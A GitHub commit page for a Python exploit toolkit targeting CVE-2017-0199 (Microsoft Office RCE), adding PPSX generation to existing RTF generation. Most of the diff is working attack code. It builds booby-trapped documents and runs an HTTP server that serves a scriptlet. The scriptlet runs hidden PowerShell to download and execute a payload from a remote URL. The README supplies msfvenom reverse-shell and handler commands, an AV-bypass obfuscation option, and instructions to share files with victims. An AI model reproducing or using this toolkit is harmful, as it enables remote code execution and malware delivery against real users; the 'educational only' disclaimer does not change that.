Skip to content

Commit

Permalink
Merge pull request #45 from bhdresh/v4.0-beta
Browse files Browse the repository at this point in the history 
V4.0-beta
@bhdresh
bhdresh authored Aug 3, 2017
2 parents 9b66127 + 3ca62ca commit 665d5cd
Showing 4 changed files with 301 additions and 149 deletions.
42 changes: 13 additions & 29 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -1,43 +1,25 @@
## Exploit toolkit CVE-2017-0199 - v3.0
## Exploit toolkit CVE-2017-0199 - v4.0

Exploit toolkit CVE-2017-0199 - v3.0 is a handy python script which provides pentesters and security researchers a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious (Obfuscated) RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.

### Video tutorial (for v2.0)

https://youtu.be/42LjG7bAvpg
Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.

### Release note:

Introduced following capabilities to the script

- Generate Malicious Obfuscated RTF file ( using -x option ) to bypass AV
##### Detection rate before obfuscation

![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v2.0-beta-3/Invoice_Normal.jpeg)
##### Detection rate after obfuscation:
![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v2.0-beta-3/Invoice_Obfuscated.jpeg)

- Deliver custom HTA file ( using -H option )
- Deliver remote payload
- Generate Malicious PPSX file
- Exploitation mode for generated PPSX file

Version: Python version 2.7.13

### Future release:

Working on following feature

- Automatically send generated malicious RTF to victim using email spoofing


### Scenario 1: Deliver local payload
###### Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
###### Sequence diagram

![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg)
@@ -46,9 +28,9 @@ Working on following feature
### Scenario 2: Deliver Remote payload
###### Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Start toolkit in exploit mode to deliver remote payload
# python cve-2017-0199_toolkit.py -M exp -e http://remoteserver.com/shell.exe
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
###### Sequence diagram

![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario2.jpg)
@@ -57,9 +39,9 @@ Working on following feature
### Scenario 3: Deliver custom HTA file
###### Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver custom HTA file
# python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta
# python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
###### Sequence diagram

![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario3.jpg)
@@ -81,13 +63,15 @@ Working on following feature

-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-t RTF|PPSX (default = RTF) Type of the file to be generated.
-x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.

-M exp Start exploitation mode

Exploitation:
-t RTF|PPSX (default = RTF) Type of file to be exolited.
-H </tmp/custom.hta> Local path of a custom HTA file which needs to be delivered and executed on target.
NOTE: This option will not deliver payloads specified through options "-e" and "-l"
@@ -104,7 +88,7 @@ This program is for Educational purpose ONLY. Do not use it without permission.

### Credit

@nixawk for RTF sample, @bhdresh
@nixawk for RTF sample, @Li Haifei, @bhdresh

### Bug, issues, feature requests

1 change: 0 additions & 1 deletion TODO.txt
View file
Original file line number Diff line number Diff line change
@@ -1,2 +1 @@
### Future release:
* Automatically send generated malicious RTF to victim using email spoofing
407 changes: 288 additions & 119 deletions cve-2017-0199_toolkit.py
View file
Original file line number Diff line number Diff line change
@@ -1,88 +1,15 @@
#!/usr/bin/env python
'''
## Exploit toolkit CVE-2017-0199 - v3.0 (https://github.com/bhdresh/CVE-2017-0199) ##
## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ##
Exploit toolkit CVE-2017-0199 - v3.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious (Obfuscated) RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
### Scenario 1: Deliver local payload
Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
### Scenario 2: Deliver Remote payload
Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver remote payload
# python cve-2017-0199_toolkit.py -M exp -e http://remoteserver.com/shell.exe
Scenario 3: Deliver custom HTA file
Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver custom HTA file
# python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta
### Command line arguments:
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
will be requested once victim will open malicious RTF file.
-x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.
-M exp Start exploitation mode
Exploitation:
-H </tmp/custom.hta> Local path of a custom HTA file which needs to be delivered and executed on target.
NOTE: This option will not deliver payloads specified through options "-e" and "-l".
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload.
'''

import os,sys,thread,socket,sys,getopt,binascii
import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile
from random import randint
from random import choice
from string import ascii_uppercase
from zipfile import ZipFile, ZIP_STORED, ZipInfo


BACKLOG = 50 # how many pending connections queue will hold
MAX_DATA_RECV = 999999 # max number of bytes we receive at once
@@ -95,38 +22,43 @@ def main(argv):
global docuri
global payloadurl
global payloadlocation
global customhta
global custom
global mode
global obfuscate
global payloadtype
filename = ''
docuri = ''
payloadurl = ''
payloadlocation = ''
customhta = ''
custom = ''
port = int("80")
host = ''
mode = ''
obfuscate = int("0")
payloadtype = 'rtf'

# Capture command line arguments
try:
opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","customhta=","obfuscate="])
opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:t:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","custom=","obfuscate=","payloadtype="])
except getopt.GetoptError:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)\n"
print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Office RCE)\n"
print "Modes:\n"
print " -M gen Generate Malicious RTF file only\n"
print " Generate malicious RTF file:\n"
print " -w <Filename.rtf> Name of malicious RTF file (Share this file with victim).\n"
print " -u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.\n"
print " -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n"
print " For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and\n"
print " will be requested once victim will open malicious RTF file.\n"
print " -M gen Generate Malicious file only\n"
print " Generate malicious payload:\n"
print " -w <Filename.rtf/Filename.ppsx> Name of malicious RTF/PPSX file (Share this file with victim).\n"
print " -u <http://attacker.com/test.hta> The path to an HTA/SCT file. Normally, this should be a domain or IP where this tool is running.\n"
print " For example, http://attacker.com/test.doc (This URL will be included in malicious file and\n"
print " will be requested once victim will open malicious RTF/PPSX file.\n"
print " -t RTF|PPSX (default = RTF) Type of the file to be generated.\n"
print " -x 0|1 (RTF only) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n"
print " -M exp Start exploitation mode\n"
print " Exploitation:\n"
print " -H </tmp/custom.hta> Local path of a custom HTA file which needs to be delivered and executed on target.\n"
print " -t RTF|PPSX (default = RTF) Type of file to be exolited.\n"
print " -H </tmp/custom> Local path of a custom HTA/SCT file which needs to be delivered and executed on target.\n"
print " NOTE: This option will not deliver payloads specified through options \"-e\" and \"-l\".\n"
print " -p <TCP port:Default 80> Local port number.\n"
print " -e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.\n"
@@ -144,44 +76,74 @@ def main(argv):
payloadurl = arg
elif opt in ("-l", "--payloadlocation"):
payloadlocation = arg
elif opt in ("-H","--customhta"):
customhta = arg
elif opt in ("-H","--custom"):
custom = arg
elif opt in ("-x","--obfuscate"):
obfuscate = int(arg)
elif opt in ("-t","--payloadtype"):
payloadtype = arg
if "gen" in mode:
if (len(filename)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(docuri)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if obfuscate == 1:
print "Generating obfuscated RTF file.\n"
generate_exploit_obfuscate_rtf()
if (len(payloadtype)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if payloadtype.upper() == 'RTF':
if obfuscate == 1:
print "Generating obfuscated RTF file.\n"
generate_exploit_obfuscate_rtf()
sys.exit()
if obfuscate == 0:
print "Generating normal RTF payload.\n"
generate_exploit_rtf()
sys.exit()
sys.exit()
if obfuscate == 0:
print "Generating normal RTF payload.\n"
generate_exploit_rtf()
if payloadtype.upper() == 'PPSX':
print "Generating normal PPSX payload.\n"
generate_exploit_ppsx()
sys.exit()
if payloadtype.upper() != 'RTF' and payloadtype.upper() != 'PPSX':
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
mode = 'Finished'
if "exp" in mode:
if (len(customhta)>1):
print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect"
exploitation()
sys.exit()
if (len(payloadurl)<1):
if payloadtype.upper() == 'RTF':
if (len(custom)>1):
print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect"
exploitation_rtf()
sys.exit()
if (len(payloadurl)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadurl)>1 and len(payloadlocation)<1):
print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect"
exploitation_rtf()
sys.exit()
print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect"
exploitation_rtf()
mode = 'Finished'
if payloadtype.upper() == 'PPSX':
if (len(custom)>1):
print "Running exploit mode (Deliver Custom SCT) - waiting for victim to connect"
exploitation_ppsx()
sys.exit()
if (len(payloadurl)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadurl)>1 and len(payloadlocation)<1):
print "Running exploit mode (Deliver SCT with remote payload) - waiting for victim to connect"
exploitation_ppsx()
sys.exit()
print "Running exploit mode (Deliver SCT + Local Payload) - waiting for victim to connect"
exploitation_ppsx()
mode = 'Finished'
if not "Finished" in mode:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadurl)>1 and len(payloadlocation)<1):
print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect"
exploitation()
sys.exit()
print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect"
exploitation()
mode = 'Finished'
if not "Finished" in mode:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
def generate_exploit_rtf():
# Preparing malicious RTF
s = docuri
@@ -285,8 +247,124 @@ def generate_exploit_obfuscate_rtf():
f.close()
print "Generated obfuscated "+filename+" successfully"


def exploitation():
def generate_exploit_ppsx():
# Preparing malicious PPSX
shutil.copy2('template/template.ppsx', filename)
class UpdateableZipFile(ZipFile):
"""
Add delete (via remove_file) and update (via writestr and write methods)
To enable update features use UpdateableZipFile with the 'with statement',
Upon __exit__ (if updates were applied) a new zip file will override the exiting one with the updates
"""

class DeleteMarker(object):
pass

def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False):
# Init base
super(UpdateableZipFile, self).__init__(file, mode=mode,
compression=compression,
allowZip64=allowZip64)
# track file to override in zip
self._replace = {}
# Whether the with statement was called
self._allow_updates = False

def writestr(self, zinfo_or_arcname, bytes, compress_type=None):
if isinstance(zinfo_or_arcname, ZipInfo):
name = zinfo_or_arcname.filename
else:
name = zinfo_or_arcname
# If the file exits, and needs to be overridden,
# mark the entry, and create a temp-file for it
# we allow this only if the with statement is used
if self._allow_updates and name in self.namelist():
temp_file = self._replace[name] = self._replace.get(name,
tempfile.TemporaryFile())
temp_file.write(bytes)
# Otherwise just act normally
else:
super(UpdateableZipFile, self).writestr(zinfo_or_arcname,
bytes, compress_type=compress_type)

def write(self, filename, arcname=None, compress_type=None):
arcname = arcname or filename
# If the file exits, and needs to be overridden,
# mark the entry, and create a temp-file for it
# we allow this only if the with statement is used
if self._allow_updates and arcname in self.namelist():
temp_file = self._replace[arcname] = self._replace.get(arcname,
tempfile.TemporaryFile())
with open(filename, "rb") as source:
shutil.copyfileobj(source, temp_file)
# Otherwise just act normally
else:
super(UpdateableZipFile, self).write(filename,
arcname=arcname, compress_type=compress_type)

def __enter__(self):
# Allow updates
self._allow_updates = True
return self

def __exit__(self, exc_type, exc_val, exc_tb):
# call base to close zip file, organically
try:
super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb)
if len(self._replace) > 0:
self._rebuild_zip()
finally:
# In case rebuild zip failed,
# be sure to still release all the temp files
self._close_all_temp_files()
self._allow_updates = False

def _close_all_temp_files(self):
for temp_file in self._replace.itervalues():
if hasattr(temp_file, 'close'):
temp_file.close()

def remove_file(self, path):
self._replace[path] = self.DeleteMarker()

def _rebuild_zip(self):
tempdir = tempfile.mkdtemp()
try:
temp_zip_path = os.path.join(tempdir, 'new.zip')
with ZipFile(self.filename, 'r') as zip_read:
# Create new zip with assigned properties
with ZipFile(temp_zip_path, 'w', compression=self.compression,
allowZip64=self._allowZip64) as zip_write:
for item in zip_read.infolist():
# Check if the file should be replaced / or deleted
replacement = self._replace.get(item.filename, None)
# If marked for deletion, do not copy file to new zipfile
if isinstance(replacement, self.DeleteMarker):
del self._replace[item.filename]
continue
# If marked for replacement, copy temp_file, instead of old file
elif replacement is not None:
del self._replace[item.filename]
# Write replacement to archive,
# and then close it (deleting the temp file)
replacement.seek(0)
data = replacement.read()
replacement.close()
else:
data = zip_read.read(item.filename)
zip_write.writestr(item, data)
# Override the archive with the updated one
shutil.move(temp_zip_path, self.filename)
finally:
shutil.rmtree(tempdir)

with UpdateableZipFile(filename, "a") as o:
o.writestr("ppt/slides/_rels/slide1.xml.rels", "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\
<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId3\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" Target=\"script:"+docuri+"\" TargetMode=\"External\"/><Relationship Id=\"rId2\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout\" Target=\"../slideLayouts/slideLayout1.xml\"/><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing\" Target=\"../drawings/vmlDrawing1.vml\"/></Relationships>")
print "Generated "+filename+" successfully"


def exploitation_rtf():

print "Server Running on ",host,":",port

@@ -334,16 +412,16 @@ def server_thread(conn, client_addr):
conn.close()
sys.exit(1)
# check if custom HTA flag is set
if (len(customhta)>1):
if (len(custom)>1):
print "Received request for custom HTA from "+client_addr[0]
try:
size = os.path.getsize(customhta)
size = os.path.getsize(custom)
except OSError:
print "Unable to read exe - "+customhta
print "Unable to read exe - "+custom
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n"
with open(customhta) as fin:
with open(custom) as fin:
data +=fin.read()
conn.send(data)
conn.close()
@@ -356,7 +434,7 @@ def server_thread(conn, client_addr):
try:
size = os.path.getsize(payloadlocation)
except OSError:
print "Unable to read"+payloadlocation
print "Unable to read "+payloadlocation
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
@@ -383,5 +461,96 @@ def server_thread(conn, client_addr):
sys.exit(1)
except socket.error, ex:
print ex


def exploitation_ppsx():

print "Server Running on ",host,":",port

try:
# create a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# associate the socket to host and port
s.bind((host, port))

# listenning
s.listen(BACKLOG)

except socket.error, (value, message):
if s:
s.close()
print "Could not open socket:", message
sys.exit(1)

# get the connection from client
while 1:
conn, client_addr = s.accept()

# create a thread to handle request
thread.start_new_thread(server_thread, (conn, client_addr))

s.close()

def server_thread(conn, client_addr):

# get the request from browser
try:
request = conn.recv(MAX_DATA_RECV)
if (len(request) > 0):
# parse the first line
first_line = request.split('\n')[0]

# get method
method = first_line.split(' ')[0]
# get url
try:
url = first_line.split(' ')[1]
except IndexError:
print "Invalid request from "+client_addr[0]
conn.close()
sys.exit(1)
# check if custom SCT flag is set
if (len(custom)>1):
print "Received request for custom SCT from "+client_addr[0]
try:
size = os.path.getsize(custom)
except OSError:
print "Unable to read custom SCT file - "+custom
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n"
with open(custom) as fin:
data +=fin.read()
conn.send(data)
conn.close()
sys.exit(1)
conn.close()
sys.exit(1)
check_exe_request = url.find('.exe')
if (check_exe_request > 0):
print "Received request for payload from "+client_addr[0]
try:
size = os.path.getsize(payloadlocation)
except OSError:
print "Unable to read"+payloadlocation
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
with open(payloadlocation) as fin:
data +=fin.read()
conn.send(data)
conn.close()
sys.exit(1)
if method in ['GET', 'get']:
print "Received GET method from "+client_addr[0]
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 1000\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n<?XML version=\"1.0\"?>\r\n<package>\r\n<component id='giffile'>\r\n<registration\r\n description='Dummy'\r\n progid='giffile'\r\n version='1.00'\r\n remotable='True'>\r\n</registration>\r\n<script language='JScript'>\r\n<![CDATA[\r\n new ActiveXObject('WScript.shell').exec('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\\'"+payloadurl+"\\', \\'c:/windows/temp/shell.exe\\'); c:/windows/temp/shell.exe');\r\n]]>\r\n</script>\r\n</component>\r\n</package>\r\n"
conn.send(data)
conn.close()
sys.exit(1)
except socket.error, ex:
print ex


if __name__ == '__main__':
main(sys.argv[1:])
Binary file added template/template.ppsx
View file
Binary file not shown.

0 comments on commit 665d5cd

Please sign in to comment.